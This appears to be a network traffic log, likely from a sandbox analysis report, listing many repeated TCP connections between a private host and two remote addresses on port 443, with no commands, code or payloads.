            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
